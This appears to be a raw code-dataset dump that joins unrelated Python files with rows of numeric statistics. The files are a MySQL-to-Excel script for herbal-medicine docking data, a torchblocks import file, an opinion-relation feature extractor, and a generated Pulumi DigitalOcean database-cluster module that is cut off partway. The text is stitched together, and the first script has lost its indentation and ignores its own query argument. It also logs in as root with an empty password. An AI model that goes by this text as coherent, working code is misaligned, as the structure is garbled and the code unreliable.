sql2='''
select *from (select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores ) a where scores>7
'''
sql3='''
select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc
) result
'''
sql4='''select * from tcmid;'''
sql5='''
select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a
where find_in_set('龙血竭', drug);
'''
sql6='''
select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a
where find_in_set('浙贝母', drug);
'''
sql7='''
select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a
where find_in_set('三七', drug);
'''
sql8='''
select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a
where find_in_set('薏苡仁', drug);
'''
def test(sql,path):
conn = pymysql.connect(host='127.0.0.1',
user='root',password='',
db='ecnu',charset='utf8',
use_unicode=True)
df = pd.read_sql(sql5, con=conn)
print(df.head())
path='D:\MarinaJacks\project\\reptilian\medicine\对接数据\中药成分数据.xlsx'
df1 = pd.read_sql(sql6, con=conn)
df2 = pd.read_sql(sql7, con=conn)
df3 = pd.read_sql(sql8, con=conn)
writer = pd.ExcelWriter(path)
df.to_excel(excel_writer=writer,sheet_name='龙血竭')
df1.to_excel(excel_writer=writer,sheet_name='浙贝母')
df2.to_excel(excel_writer=writer,sheet_name='三七')
df3.to_excel(excel_writer=writer,sheet_name='薏苡仁')
writer.save()
writer.close()
if __name__=="__main__":
sql0='''
select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc;
'''
path="D:\MarinaJacks\project\\reptilian\medicine\对接数据\data6.xlsx"
sql1='''select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a where '龙血竭' in (drug)
'''
test(sql1,path)
df=pd.read_excel('D:\MarinaJacks\project\\reptilian\medicine\对接数据\打分结果.xlsx',sheet_name='可视化分析')
| 38.75
| 119
| 0.649088
| 1,083
| 7,130
| 4.23084
| 0.111727
| 0.076822
| 0.043213
| 0.064164
| 0.879092
| 0.879092
| 0.870362
| 0.822348
| 0.822348
| 0.822348
| 0
| 0.009259
| 0.242637
| 7,130
| 184
| 120
| 38.75
| 0.839259
| 0.002945
| 0
| 0.611111
| 0
| 0.152778
| 0.853146
| 0.235762
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.006944
| 0.013889
| null | null | 0.006944
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
67dbbe24bd6d01d7dde4d2b5b5091e9fd7d03b08
| 256
|
py
|
Python
|
torchblocks/models/nn/__init__.py
|
lonePatient/TorchBlocks
|
4a65d746cc8a396cb7df73ed4644d97ddf843e29
|
[
"MIT"
] | 82
|
2020-06-23T05:51:08.000Z
|
2022-03-29T08:11:08.000Z
|
torchblocks/models/nn/__init__.py
|
Raiselimit/TorchBlocks
|
a5baecb9a2470ff175087475630f2b7db3f7ef51
|
[
"MIT"
] | null | null | null |
torchblocks/models/nn/__init__.py
|
Raiselimit/TorchBlocks
|
a5baecb9a2470ff175087475630f2b7db3f7ef51
|
[
"MIT"
] | 22
|
2020-06-23T05:51:10.000Z
|
2022-03-18T07:01:43.000Z
|
from .bert_for_ner import *
from .bert_with_mdp import *
from .bert_for_multilabel import *
from .bert_for_siamese import *
from .bert_for_triple import BertForTripletNet
from .bert_for_attr import BertCRFForAttr
from .bert_for_relation import REBERT
| 36.571429
| 47
| 0.828125
| 38
| 256
| 5.210526
| 0.394737
| 0.282828
| 0.333333
| 0.257576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128906
| 256
| 7
| 48
| 36.571429
| 0.887892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e1eeebc22e7fe20f6d1e19a51285e73163ed18c9
| 10,227
|
py
|
Python
|
scripts/extract_feats_relations.py
|
opener-project/opinion_miner_deluxe
|
ec73ca3a593648a23a66752392fd869ac65e363d
|
[
"Apache-2.0"
] | 1
|
2015-05-13T20:38:12.000Z
|
2015-05-13T20:38:12.000Z
|
scripts/extract_feats_relations.py
|
opener-project/opinion_miner_deluxe
|
ec73ca3a593648a23a66752392fd869ac65e363d
|
[
"Apache-2.0"
] | null | null | null |
scripts/extract_feats_relations.py
|
opener-project/opinion_miner_deluxe
|
ec73ca3a593648a23a66752392fd869ac65e363d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import sys
def write_to_output(my_class,feats, output):
my_str = my_class
for name, value in feats:
my_str += '\t'+name+'='+value
output.write(my_str.encode('utf-8')+'\n')
#########################################################################
# EXTRACTION OF FEATURES FOR TRAINING THE RELATION CLASSIFIER EXP --> TARGET
#########################################################################
# This function extracts features for the relation between expression adn target
# for the svm classifier
def extract_feats_exp_tar(exp_ids,tar_ids,knaf_obj, use_lemmas=True, use_tokens=True, use_dependencies=True):
all_feats = []
data_for_token = {} # [token_id] -> (word, sentence_id)
for num_token, token_obj in enumerate(knaf_obj.get_tokens()):
word = token_obj.get_text()
s_id = token_obj.get_sent()
w_id = token_obj.get_id()
data_for_token[w_id] = (word,s_id,num_token)
# Loading data for terms
data_for_term = {} # [term_id] -> (lemma, span_token_ids)
for term in knaf_obj.get_terms():
termid = term.get_id()
lemma = term.get_lemma()
span = term.get_span()
span_token_ids = []
if span is not None:
span_token_ids = span.get_span_ids()
data_for_term[termid] = (lemma,span_token_ids)
sentence_for_exp = None
avg_position_exp = 0
n_toks = 0
for my_id in exp_ids:
lemma, span_tok_ids = data_for_term[my_id]
if use_lemmas:
all_feats.append(('lemmaExp',lemma))
for tok_id in span_tok_ids:
token,sent_id,num_token = data_for_token[tok_id]
avg_position_exp += num_token
n_toks += 1
if use_tokens:
all_feats.append(('tokenExp',token))
if sentence_for_exp is None:
sentence_for_exp = sent_id
avg_position_exp = avg_position_exp * 1.0 / n_toks
#Lemmas for target
sentence_for_tar = None
avg_position_tar = 0
n_toks = 0
for my_id in tar_ids:
lemma, span_tok_ids = data_for_term[my_id]
if use_lemmas:
all_feats.append(('lemmaTar',lemma))
for tok_id in span_tok_ids:
token,sent_id,num_token = data_for_token[tok_id]
avg_position_tar += num_token
n_toks += 1
if use_tokens:
all_feats.append(('tokenTar',token))
if sentence_for_tar is None:
sentence_for_tar = sent_id
avg_position_tar = avg_position_tar * 1.0 / n_toks
if use_dependencies:
dependency_extractor = knaf_obj.get_dependency_extractor()
if dependency_extractor is not None:
deps = dependency_extractor.get_shortest_path_spans(exp_ids,tar_ids)
if deps is not None:
all_feats.append(('deps-exp-tar','#'.join(deps)))
if sentence_for_exp is not None and sentence_for_tar is not None and sentence_for_exp == sentence_for_tar:
all_feats.append(('same_sentence','yes'))
else:
all_feats.append(('same_sentence','no'))
##Distance
dist = abs(avg_position_exp - avg_position_tar)
if dist <= 10:
my_dist = 'veryclose'
elif dist <=20:
my_dist = 'close'
elif dist <=25:
my_dist = 'far'
else:
my_dist = 'veryfar'
all_feats.append(('distExpTar',my_dist))
return all_feats
def create_rel_exp_tar_training(knaf_obj, output=sys.stdout, valid_opinions=None,use_dependencies=True,use_tokens=True, use_lemmas=True):
# Obtain pairs of features for Expression and Target
pairs = [] # [(Exp,Tar), (E,T), (E,T)....]
for opinion in knaf_obj.get_opinions():
opi_id = opinion.get_id()
opi_exp = opinion.get_expression()
exp_type = ''
exp_ids = []
if opi_exp is not None:
exp_type = opi_exp.get_polarity()
span = opi_exp.get_span()
if span is not None:
exp_ids = span.get_span_ids()
opi_tar = opinion.get_target()
tar_ids = []
if opi_tar is not None:
span = opi_tar.get_span()
if span is not None:
tar_ids = span.get_span_ids()
if valid_opinions is not None:
if exp_type not in valid_opinions:
continue ## This opinions will not be used
if len(tar_ids) != 0 and len(exp_ids) != 0:
pairs.append((exp_ids,tar_ids))
#extract_feats_exp_tar(exp_ids,tar_ids,knaf_obj, use_lemmas=True, use_tokens=True, use_dependencies=True)
for idx1, (exp1, tar1) in enumerate(pairs):
feats_positive = extract_feats_exp_tar(exp1,tar1,knaf_obj,use_dependencies=use_dependencies, use_tokens=use_tokens,use_lemmas=use_lemmas)
write_to_output('+1', feats_positive, output)
for idx2, (exp2, tar2) in enumerate(pairs):
if idx1 != idx2:
feats_negative = extract_feats_exp_tar(exp1,tar2,knaf_obj,use_dependencies=use_dependencies, use_tokens=use_tokens,use_lemmas=use_lemmas)
write_to_output('-1', feats_negative, output)
def extract_feats_exp_hol(exp_ids,hol_ids,knaf_obj, use_lemmas=True, use_tokens=True, use_dependencies=True):
all_feats = []
data_for_token = {} # [token_id] -> (word, sentence_id)
for num_token, token_obj in enumerate(knaf_obj.get_tokens()):
word = token_obj.get_text()
s_id = token_obj.get_sent()
w_id = token_obj.get_id()
data_for_token[w_id] = (word,s_id,num_token)
# Loading data for terms
data_for_term = {} # [term_id] -> (lemma, span_token_ids)
for term in knaf_obj.get_terms():
termid = term.get_id()
lemma = term.get_lemma()
span = term.get_span()
span_token_ids = []
if span is not None:
span_token_ids = span.get_span_ids()
data_for_term[termid] = (lemma,span_token_ids)
sentence_for_exp = None
avg_position_exp = 0
n_toks = 0
for my_id in exp_ids:
lemma, span_tok_ids = data_for_term[my_id]
if use_lemmas:
all_feats.append(('lemmaExp',lemma))
for tok_id in span_tok_ids:
token,sent_id,num_token = data_for_token[tok_id]
avg_position_exp += num_token
n_toks += 1
if use_tokens:
all_feats.append(('tokenExp',token))
if sentence_for_exp is None:
sentence_for_exp = sent_id
avg_position_exp = avg_position_exp * 1.0 / n_toks
#Lemmas for HOLDER
sentence_for_hol = None
avg_position_hol = 0
n_toks = 0
for my_id in hol_ids:
lemma, span_tok_ids = data_for_term[my_id]
if use_lemmas:
all_feats.append(('lemmaHol',lemma))
for tok_id in span_tok_ids:
token,sent_id,num_token = data_for_token[tok_id]
avg_position_hol += num_token
n_toks += 1
if use_tokens:
all_feats.append(('tokenHol',token))
if sentence_for_hol is None:
sentence_for_hol = sent_id
avg_position_hol = avg_position_hol * 1.0 / n_toks
if use_dependencies:
dependency_extractor = knaf_obj.get_dependency_extractor()
if dependency_extractor is not None:
deps = dependency_extractor.get_shortest_path_spans(exp_ids,hol_ids)
if deps is not None:
all_feats.append(('deps-exp-hol','#'.join(deps)))
if sentence_for_exp is not None and sentence_for_hol is not None and sentence_for_exp == sentence_for_hol:
all_feats.append(('same_sentence','yes'))
else:
all_feats.append(('same_sentence','no'))
##Distance
dist = abs(avg_position_exp - avg_position_hol)
if dist <= 10:
my_dist = 'veryclose'
elif dist <=20:
my_dist = 'close'
elif dist <=25:
my_dist = 'far'
else:
my_dist = 'veryfar'
all_feats.append(('distExpHol',my_dist))
#all_feats.append(('absDist',str(dist)))
return all_feats
def create_rel_exp_hol_training(knaf_obj, output=sys.stdout, valid_opinions=None,use_dependencies=True,use_tokens=True,use_lemmas=True):
# Obtain pairs of features for Expression and Holder
pairs = [] # [(Exp,Hol), (E,H), (E,H)....]
for opinion in knaf_obj.get_opinions():
opi_exp = opinion.get_expression()
exp_type = ''
exp_ids = []
if opi_exp is not None:
exp_type = opi_exp.get_polarity()
span = opi_exp.get_span()
if span is not None:
exp_ids = span.get_span_ids()
opi_hol = opinion.get_holder()
hol_ids = []
if opi_hol is not None:
span = opi_hol.get_span()
if span is not None:
hol_ids = span.get_span_ids()
if valid_opinions is not None:
if exp_type not in valid_opinions:
continue ## This opinions will not be used
if len(exp_ids) != 0 and len(hol_ids) != 0:
pairs.append((exp_ids,hol_ids))
#for feat_exp, feat_tar
for idx1, (expids1, tarids1) in enumerate(pairs):
feats_positive = extract_feats_exp_hol(expids1,tarids1,knaf_obj, use_dependencies=use_dependencies,use_tokens=use_tokens,use_lemmas=use_lemmas)
write_to_output('+1', feats_positive,output)
for idx2, (expids2, tarids2) in enumerate(pairs):
if idx1 != idx2:
feats_negative = extract_feats_exp_hol(expids1,tarids2,knaf_obj, use_dependencies=use_dependencies,use_tokens=use_tokens,use_lemmas=use_lemmas)
write_to_output('-1', feats_negative ,output)
| 34.550676
| 159
| 0.589811
| 1,372
| 10,227
| 4.044461
| 0.105685
| 0.030276
| 0.032438
| 0.011894
| 0.829699
| 0.817805
| 0.810236
| 0.802307
| 0.757434
| 0.744098
| 0
| 0.009172
| 0.30703
| 10,227
| 295
| 160
| 34.667797
| 0.773811
| 0.08194
| 0
| 0.702439
| 0
| 0
| 0.025825
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.004878
| 0
| 0.039024
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1f5399b6d3fd985c884c869bc58d025e5ba7f8f
| 43,129
|
py
|
Python
|
sdk/python/pulumi_digitalocean/database_cluster.py
|
pulumi/pulumi-digitalocean
|
b924205ec8f66f5240a755c91aa8642162038dfb
|
[
"ECL-2.0",
"Apache-2.0"
] | 53
|
2019-04-25T14:43:12.000Z
|
2022-03-14T15:51:44.000Z
|
sdk/python/pulumi_digitalocean/database_cluster.py
|
pulumi/pulumi-digitalocean
|
b924205ec8f66f5240a755c91aa8642162038dfb
|
[
"ECL-2.0",
"Apache-2.0"
] | 158
|
2019-04-15T21:47:18.000Z
|
2022-03-29T21:21:57.000Z
|
sdk/python/pulumi_digitalocean/database_cluster.py
|
pulumi/pulumi-digitalocean
|
b924205ec8f66f5240a755c91aa8642162038dfb
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2019-04-15T20:16:11.000Z
|
2021-05-28T19:08:32.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['DatabaseClusterArgs', 'DatabaseCluster']
@pulumi.input_type
class DatabaseClusterArgs:
def __init__(__self__, *,
engine: pulumi.Input[str],
node_count: pulumi.Input[int],
region: pulumi.Input[Union[str, 'Region']],
size: pulumi.Input[Union[str, 'DatabaseSlug']],
eviction_policy: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DatabaseCluster resource.
:param pulumi.Input[str] engine: Database engine used by the cluster (ex. `pg` for PostgreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
:param pulumi.Input[int] node_count: Number of nodes that will be included in the cluster.
:param pulumi.Input[Union[str, 'Region']] region: DigitalOcean region where the cluster will reside.
:param pulumi.Input[Union[str, 'DatabaseSlug']] size: Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
:param pulumi.Input[str] eviction_policy: A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
:param pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]] maintenance_windows: Defines when the automatic maintenance should be performed for the database cluster.
:param pulumi.Input[str] name: The name of the database cluster.
:param pulumi.Input[str] private_network_uuid: The ID of the VPC where the database cluster will be located.
:param pulumi.Input[str] sql_mode: A comma separated string specifying the SQL modes for a MySQL cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tag names to be applied to the database cluster.
:param pulumi.Input[str] version: Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
pulumi.set(__self__, "engine", engine)
pulumi.set(__self__, "node_count", node_count)
pulumi.set(__self__, "region", region)
pulumi.set(__self__, "size", size)
if eviction_policy is not None:
pulumi.set(__self__, "eviction_policy", eviction_policy)
if maintenance_windows is not None:
pulumi.set(__self__, "maintenance_windows", maintenance_windows)
if name is not None:
pulumi.set(__self__, "name", name)
if private_network_uuid is not None:
pulumi.set(__self__, "private_network_uuid", private_network_uuid)
if sql_mode is not None:
pulumi.set(__self__, "sql_mode", sql_mode)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def engine(self) -> pulumi.Input[str]:
"""
Database engine used by the cluster (ex. `pg` for PostgreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: pulumi.Input[str]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="nodeCount")
def node_count(self) -> pulumi.Input[int]:
"""
Number of nodes that will be included in the cluster.
"""
return pulumi.get(self, "node_count")
@node_count.setter
def node_count(self, value: pulumi.Input[int]):
pulumi.set(self, "node_count", value)
@property
@pulumi.getter
def region(self) -> pulumi.Input[Union[str, 'Region']]:
"""
DigitalOcean region where the cluster will reside.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[Union[str, 'Region']]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> pulumi.Input[Union[str, 'DatabaseSlug']]:
"""
Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: pulumi.Input[Union[str, 'DatabaseSlug']]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="evictionPolicy")
def eviction_policy(self) -> Optional[pulumi.Input[str]]:
"""
A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
"""
return pulumi.get(self, "eviction_policy")
@eviction_policy.setter
def eviction_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "eviction_policy", value)
@property
@pulumi.getter(name="maintenanceWindows")
def maintenance_windows(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]]:
"""
Defines when the automatic maintenance should be performed for the database cluster.
"""
return pulumi.get(self, "maintenance_windows")
@maintenance_windows.setter
def maintenance_windows(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]]):
pulumi.set(self, "maintenance_windows", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the database cluster.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateNetworkUuid")
def private_network_uuid(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VPC where the database cluster will be located.
"""
return pulumi.get(self, "private_network_uuid")
@private_network_uuid.setter
def private_network_uuid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_network_uuid", value)
@property
@pulumi.getter(name="sqlMode")
def sql_mode(self) -> Optional[pulumi.Input[str]]:
"""
A comma separated string specifying the SQL modes for a MySQL cluster.
"""
return pulumi.get(self, "sql_mode")
@sql_mode.setter
def sql_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_mode", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tag names to be applied to the database cluster.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class _DatabaseClusterState:
def __init__(__self__, *,
cluster_urn: Optional[pulumi.Input[str]] = None,
database: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[str]] = None,
host: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
node_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
private_host: Optional[pulumi.Input[str]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
private_uri: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[Union[str, 'Region']]] = None,
size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
uri: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DatabaseCluster resources.
:param pulumi.Input[str] cluster_urn: The uniform resource name of the database cluster.
:param pulumi.Input[str] database: Name of the cluster's default database.
:param pulumi.Input[str] engine: Database engine used by the cluster (ex. `pg` for PostgreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
:param pulumi.Input[str] eviction_policy: A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
:param pulumi.Input[str] host: Database cluster's hostname.
:param pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]] maintenance_windows: Defines when the automatic maintenance should be performed for the database cluster.
:param pulumi.Input[str] name: The name of the database cluster.
:param pulumi.Input[int] node_count: Number of nodes that will be included in the cluster.
:param pulumi.Input[str] password: Password for the cluster's default user.
:param pulumi.Input[int] port: Network port that the database cluster is listening on.
:param pulumi.Input[str] private_host: Same as `host`, but only accessible from resources within the account and in the same region.
:param pulumi.Input[str] private_network_uuid: The ID of the VPC where the database cluster will be located.
:param pulumi.Input[str] private_uri: Same as `uri`, but only accessible from resources within the account and in the same region.
:param pulumi.Input[Union[str, 'Region']] region: DigitalOcean region where the cluster will reside.
:param pulumi.Input[Union[str, 'DatabaseSlug']] size: Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
:param pulumi.Input[str] sql_mode: A comma separated string specifying the SQL modes for a MySQL cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tag names to be applied to the database cluster.
:param pulumi.Input[str] uri: The full URI for connecting to the database cluster.
:param pulumi.Input[str] user: Username for the cluster's default user.
:param pulumi.Input[str] version: Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
if cluster_urn is not None:
pulumi.set(__self__, "cluster_urn", cluster_urn)
if database is not None:
pulumi.set(__self__, "database", database)
if engine is not None:
pulumi.set(__self__, "engine", engine)
if eviction_policy is not None:
pulumi.set(__self__, "eviction_policy", eviction_policy)
if host is not None:
pulumi.set(__self__, "host", host)
if maintenance_windows is not None:
pulumi.set(__self__, "maintenance_windows", maintenance_windows)
if name is not None:
pulumi.set(__self__, "name", name)
if node_count is not None:
pulumi.set(__self__, "node_count", node_count)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if private_host is not None:
pulumi.set(__self__, "private_host", private_host)
if private_network_uuid is not None:
pulumi.set(__self__, "private_network_uuid", private_network_uuid)
if private_uri is not None:
pulumi.set(__self__, "private_uri", private_uri)
if region is not None:
pulumi.set(__self__, "region", region)
if size is not None:
pulumi.set(__self__, "size", size)
if sql_mode is not None:
pulumi.set(__self__, "sql_mode", sql_mode)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if uri is not None:
pulumi.set(__self__, "uri", uri)
if user is not None:
pulumi.set(__self__, "user", user)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="clusterUrn")
def cluster_urn(self) -> Optional[pulumi.Input[str]]:
"""
The uniform resource name of the database cluster.
"""
return pulumi.get(self, "cluster_urn")
@cluster_urn.setter
def cluster_urn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_urn", value)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
Name of the cluster's default database.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def engine(self) -> Optional[pulumi.Input[str]]:
"""
Database engine used by the cluster (ex. `pg` for PostgreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="evictionPolicy")
def eviction_policy(self) -> Optional[pulumi.Input[str]]:
"""
A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
"""
return pulumi.get(self, "eviction_policy")
@eviction_policy.setter
def eviction_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "eviction_policy", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Database cluster's hostname.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="maintenanceWindows")
def maintenance_windows(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]]:
"""
Defines when the automatic maintenance should be performed for the database cluster.
"""
return pulumi.get(self, "maintenance_windows")
@maintenance_windows.setter
def maintenance_windows(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]]):
